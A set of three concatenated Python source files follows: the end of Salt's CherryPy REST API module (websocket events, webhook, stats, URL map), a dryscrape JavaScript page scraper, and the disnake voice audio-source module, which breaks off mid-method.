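# documented above from Python with the third-party ``requests`` library. The
# token value and host are assumptions for the example only.
def _example_client_events(token='308650d'):
    import requests  # assumed to be installed; not a dependency of this module
    resp = requests.get(
        'http://localhost:8000/events',
        params={'token': token},
        stream=True,
    )
    for line in resp.iter_lines(decode_unicode=True):
        # Records are "tag: ..." / "data: ..." pairs separated by blank lines.
        if line and line.startswith('data: '):
            yield json.loads(line[len('data: '):])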
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
The above examples show how to establish a websocket connection to Salt
and activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services
can be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
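# Illustrative sketch (not part of this module): firing the generic web hook
# documented above from Python with the third-party ``requests`` library. The URL
# suffix and payload mirror the docstring example and are assumptions only.
def _example_client_webhook(extra_headers=None):
    import requests  # assumed to be installed; not a dependency of this module
    resp = requests.post(
        'http://localhost:8000/hook/mycompany/build/success',
        json={'revision': 'aa22a3c4b2e7', 'result': True},
        headers=extra_headers or {},
    )
    resp.raise_for_status()
    return resp.json()['success']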
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
# Late import
try:
from cherrypy.lib import cpstats
except ImportError:
logger.error('Import of cherrypy.lib.cpstats failed. Possible '
'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
return {}
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
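# Illustrative sketch (not part of this module): how the values returned by
# get_app() could be mounted into a standalone CherryPy server. The salt-api
# daemon normally performs this step; ``opts`` would be the loaded master config.
def _example_serve(opts):
    root, _apiopts, cpyopts = get_app(opts)
    cherrypy.tree.mount(root, '/', config=cpyopts)
    cherrypy.engine.start()
    cherrypy.engine.block()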
|
jspagescraper.py
|
from multiprocessing import Process, Manager, cpu_count
import webkit_server
import dryscrape
from sa.database import Database
from sa.logger import LOGGER
def get_html(urlQ, callback, xpath_hooks):
"""
This function takes a url from the URL queue (urlQ) and
calls a callback that will handle the page source.
xpath_hooks is a list used to determine when the page is loaded;
see the docs for more details (e.g. ["//div[@data-test='whatever']"] ).
"""
svr = webkit_server.Server()
svrconn = webkit_server.ServerConnection(server=svr)
driver = dryscrape.driver.webkit.Driver(connection=svrconn)
sess = dryscrape.Session(driver=driver)
sess.set_header("User-Agent", "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36")
sess.set_attribute("auto_load_images", False)
valid_page_func = lambda: any(sess.at_xpath(xpath) for xpath in xpath_hooks)
db = Database()
while not urlQ.empty():
url = urlQ.get()
sess.visit(url)
try:
sess.wait_for(valid_page_func, interval=1, timeout=15)
except dryscrape.mixins.WaitTimeoutError:
LOGGER.error("Timeout so skipping", url)
continue
response = sess.body()
callback(db, url, response)
sess.reset()
svr.kill()
db.destroy()
class JSPageScraper():
def __init__(self, callback, xpath_hooks, table_name, nproc = None):
self.callback = callback
self.xpath_hooks = xpath_hooks
self.table_name = table_name
self.nproc = cpu_count() - 1 if nproc is None else nproc
def go(self, urls):
LOGGER.info("Preparing threads...")
manager = Manager()
urlQ = manager.Queue()
for url in urls:
urlQ.put(url)
procs = [Process(target=get_html, args=(urlQ, self.callback, self.xpath_hooks), daemon=True) for i in range(self.nproc)]
LOGGER.info("Threads started. Fetching n' parsing!")
for proc in procs:
proc.start()
for proc in procs:
proc.join()
if __name__ == "__main__":
def dic_parse(db, url, html):
LOGGER.notice("Got url", url, "and html with length", len(html))
xpath_hooks = ["//div[@data-test='qsp-statistics']", "//div[@data-test='unknown-quote']"]
jsps = JSPageScraper(dic_parse, xpath_hooks, "key_statistics")
urls = ["https://ca.finance.yahoo.com/quote/IMO.TO/key-statistics"]
jsps.go(urls)
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Disnake Development
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from . import utils
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
if TYPE_CHECKING:
from .voice_client import VoiceClient
MISSING = utils.MISSING
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
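# Illustrative sketch (not part of the library): feeding raw 16-bit 48KHz stereo
# PCM (silence here) through PCMAudio and counting the 20ms frames it yields.
def _example_pcm_framing() -> int:
    silence = io.BytesIO(b"\x00" * (OpusEncoder.FRAME_SIZE * 3))
    source = PCMAudio(silence)
    frames = 0
    while source.read():
        frames += 1
    return frames  # 3 full frames for this input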
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User-created AudioSources that use FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError(
"parameter conflict: 'source' parameter cannot be a string when piping to stdin"
)
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(
target=self._pipe_writer, args=(source,), daemon=True, name=n
)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(executable + " was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info("ffmpeg process %s has not terminated. Waiting to terminate...", proc.pid)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem", self, exc_info=True
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def check_streams(self) -> None:
if self._process is MISSING or self._stdout is MISSING or self._stdin is MISSING:
raise ValueError("FFmpegAudio cannot be read more than once")
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
# self.check_streams()
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
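# Illustrative sketch (not part of the library): typical FFmpegPCMAudio usage.
# Assumes ``voice_client`` is an already-connected VoiceClient and that the given
# file exists; ffmpeg must be on PATH as noted in the docstring above.
def _example_play_pcm(voice_client: VoiceClient, path: str = "music.mp3") -> None:
    source = FFmpegPCMAudio(path, options="-vn")  # -vn: ignore any video stream
    voice_client.play(source, after=lambda err: print("finished:", err))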
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, "_probe_codec_" + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError(
"Expected str or callable for parameter 'probe', "
f"not '{method.__class__.__name__}'"
)
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
